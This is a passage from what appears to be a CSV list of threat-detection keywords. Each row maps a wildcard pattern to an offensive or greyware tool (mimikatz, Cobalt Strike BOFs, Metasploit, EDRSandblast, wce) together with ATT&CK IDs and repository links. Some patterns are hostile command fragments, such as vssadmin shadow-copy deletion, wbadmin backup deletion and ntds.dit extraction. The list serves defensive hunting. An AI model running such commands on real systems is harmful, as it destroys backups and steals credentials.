C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,1,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -*volatility2 --profile=*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*volatility3 -f *.dmp*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*VPNPivot*,offensive_tool_keyword,VPNPivot,Sometime we do external penetration testing and when we compromise the remote target we would like to explore the internal network behind and getting such compromise like owning Active directory. accessing shared files. conducting MITM attacks ... etc,T1090 - T1095 - T1562 - T1201 - T1558,TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Data Exfiltration,https://github.com/0x36/VPNPivot,1,1,N/A,N/A,3,256,52,2016-07-21T08:49:26Z,2015-08-26T18:44:42Z -*vRealizeLogInsightRCE*,offensive_tool_keyword,vRealizeLogInsightRCE,POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711),T1190 - T1071 - T1003 - T1069 - T1110 - T1222,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/horizon3ai/vRealizeLogInsightRCE,1,1,Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ,N/A,2,147,24,2023-01-31T11:41:08Z,2023-01-30T22:01:08Z -*vsf_sysutil_read_loop*,greyware_tool_keyword,vsftpd,Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts,T1071.004 - T1078.004,TA0011 - TA0006,N/A,N/A,Exploitation Tools,https://github.com/dagwieers/vsftpd/,1,1,greyware tool - risks of False positive !,N/A,1,47,66,2020-11-10T13:07:55Z,2013-06-13T10:11:54Z -*vssadmin create shadow /for=C:*,greyware_tool_keyword,vssadmin,the command is used to create a new Volume Shadow Copy for a specific volume which can be utilized by an attacker to collect data from the local system,T1005,TA0009,N/A,N/A,Collection,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*vssadmin create shadow /for=C:* \Temp\*.tmp*,greyware_tool_keyword,vssadmin,the actor creating a Shadow Copy and then extracting a copy of the ntds.dit file from it.,T1003.001 - T1567.001 - T1070.004,TA0005 - TA0003 - TA0007,N/A,Volt Typhoon,Credential Access,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*vssadmin list shadows*,greyware_tool_keyword,vssadmin,List shadow copies using vssadmin,T1059.003 - T1059.001 - T1005,TA0002 - TA0005 - TA0010,N/A,N/A,discovery,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*vssadmin* Delete Shadows /All /Quiet*,greyware_tool_keyword,vssadmin,Deletes all Volume Shadow Copies from the system quietly (without prompts).,T1490,TA0040,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*vssenum.x64.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*vssenum.x86.*,offensive_tool_keyword,cobaltstrike,Situational Awareness commands implemented using Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/trustedsec/CS-Situational-Awareness-BOF,1,1,N/A,10,10,964,172,2023-09-22T15:51:55Z,2020-07-15T16:21:18Z -*vtiger_crm_upload_exploit*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*vulfocus/spring-core-rce-*,offensive_tool_keyword,SpringCore0day,SpringCore0day from share.vx-underground.org & some additional links,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/craig/SpringCore0day,1,1,N/A,N/A,4,394,187,2022-03-31T11:54:22Z,2022-03-30T15:50:28Z -*vulmon*Vulmap*,offensive_tool_keyword,Vulmap,Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also. they can be used for privilege escalation by pentesters/red teamers.,T1210.001 - T1190 - T1059 - T1213,TA0007 - TA0002 - TA0008 - TA0011,N/A,N/A,Vulnerability scanner,https://github.com/vulmon/Vulmap,1,1,N/A,N/A,9,888,196,2023-03-18T23:56:41Z,2018-09-07T15:49:36Z -*Vulnerabilities/RPCDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*vulnfactory.org/exploits/*.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*vulns/apache.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*vulns/iis.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*vulns/jrun.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*vulns/tomcat.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*vulnweb.com/FUZZ*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*vulny-code-static-analysis --dir *,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*vu-ls/Crassus*,offensive_tool_keyword,Crassus,Crassus Windows privilege escalation discovery tool,T1068 - T1003 - T1003.003 - T1046,TA0004 - TA0007,N/A,N/A,Privilege Escalation,https://github.com/vu-ls/Crassus,1,1,N/A,10,6,503,55,2023-09-29T20:02:02Z,2023-01-12T21:01:52Z -*vyrus001/go-mimikatz*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/vyrus001/go-mimikatz,1,1,N/A,10,6,593,105,2022-09-08T18:14:20Z,2015-10-22T08:43:38Z -*vysecurity*,offensive_tool_keyword,Github Username,github username hosting red team tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/vysecurity,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*vysecurity/ANGRYPUPPY*,offensive_tool_keyword,cobaltstrike,Bloodhound Attack Path Automation in CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/vysecurity/ANGRYPUPPY,1,1,N/A,10,10,300,93,2020-04-26T17:35:31Z,2017-07-11T14:18:07Z -*-w *wordlists*.txt*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,0,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z -*W2F1dG9ydW5dDQpzaGVsbGV4ZWN1dGU9eTMyNHNlZHguZXhlDQppY29uPSVTeXN0ZW1Sb290JVxzeXN0ZW0zMlxTSEVMTDMyLmRsbCw0DQphY3Rpb249T3BlbiBmb2xkZXIgdG8gdmlldyBmaWxlcw0Kc2hlbGxcZGVmYXVsdD1PcGVuDQpzaGVsbFxkZWZhdWx0XGNvbW1hbmQ9eTMyNHNlZHguZXhlDQpzaGVsbD1kZWZhdWx0*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*w32-speaking-shellcode.asm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*w32-speaking-shellcode.bin*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*w32-speaking-shellcode-eaf.bin*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*w3af_gui*,offensive_tool_keyword,w3af,w3af is a Web Application Attack and Audit Framework. The projects goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.,T1190 - T1211 - T1220 - T1222 - T1247 - T1592,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,N/A,N/A,Vulnerability scanner,https://w3af.org/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*WAF-bypass-Cheat-Sheet*,offensive_tool_keyword,WAF-bypass-Cheat-Sheet,WAF/IPS/DLP bypass Cheat Sheet,T1210 - T1204 - T1061 - T1133 - T1190,TA0001 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet,1,1,N/A,N/A,5,408,64,2018-11-28T20:34:17Z,2018-11-28T19:34:02Z -*wafw00f https://*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*wafw00f*,offensive_tool_keyword,wafw00f,To do its magic. WAFW00F does the following Sends a normal HTTP request and analyses the response. this identifies a number of WAF solutions. If that is not successful. it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is. If that is also not successful. it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks.,T1210.001 - T1190 - T1589,TA0007 - TA0002 - TA0008,N/A,N/A,Defense Evasion,https://github.com/EnableSecurity/wafw00f,1,1,N/A,N/A,10,4470,882,2023-06-28T09:24:59Z,2014-05-14T17:08:16Z -*wapiti -u*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wapiti.git*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wapiti.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wapiti3-*.tar.gz*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wapiti3-*-any.whl*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wapiti3/bin*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wapiti-getcookie*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*wappalyzer.py*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*warberry*,offensive_tool_keyword,warberry,WarBerryPi is a RaspberryPi based hardware implant that has the ability to go on stealth mode when used in acuiring informational data from a target network. especially useful during read teaming engagements. Its designed with a special feature that allows it to get the needed information within the shortest time possible. WarBerryPis scripts are designed in such way to avoid noise in the network as much as possible.,T1589 - T1539 - T1562,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/secgroundzero/warberry,1,1,N/A,N/A,10,2209,307,2019-11-09T00:09:44Z,2016-05-10T16:25:03Z -*warpzoneclient.cpp*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*warpzoneclient.exe*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*warpzoneclient.exe*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*warpzoneclient.sln*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*warpzoneclient.vcxproj*,offensive_tool_keyword,elevationstation,elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative,T1548.002 - T1055 - T1574.002 - T1078.003,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/g3tsyst3m/elevationstation,1,1,N/A,N/A,3,271,33,2023-08-17T02:45:17Z,2023-06-10T03:30:59Z -*wavestone-cdt/EDRSandblast*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*wavvs/nanorobeus*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,1,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*waza1234*,offensive_tool_keyword,mimikatz,mimikatz exploitation default password,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,1,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*WazeHell/sam-the-admin*,offensive_tool_keyword,POC,POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user,T1548 - T1134 - T1078.002 - T1078,TA0003 - TA0008 - TA0002,N/A,N/A,Exploitation tools,https://github.com/WazeHell/sam-the-admin/tree/main/utils,1,1,N/A,N/A,10,929,190,2022-07-10T22:23:13Z,2021-12-11T15:10:30Z -*wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest*,greyware_tool_keyword,wbadmin,Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. adversaries can make it more challenging for defenders to restore systems and detect their presence.,T1490 - T1562.001,TA0040 - TA0007,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wbadmin DELETE SYSTEMSTATEBACKUP*,greyware_tool_keyword,wbadmin,Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. adversaries can make it more challenging for defenders to restore systems and detect their presence.,T1490 - T1562.001,TA0040 - TA0007,N/A,N/A,Defense Evasion,N/A,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wce -i 3e5 -s *,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,0,N/A,8,4,N/A,N/A,N/A,N/A -*wce*getlsasrvaddr.exe*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*wce-master.zip*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*wce-universal.exe*,offensive_tool_keyword,wce,Windows Credentials Editor,T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001,TA0006 - TA0005 - TA0002,N/A,N/A,Credential Access,https://www.kali.org/tools/wce/,1,1,N/A,8,4,N/A,N/A,N/A,N/A -*wcfrelayserver.py*,offensive_tool_keyword,cobaltstrike,Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 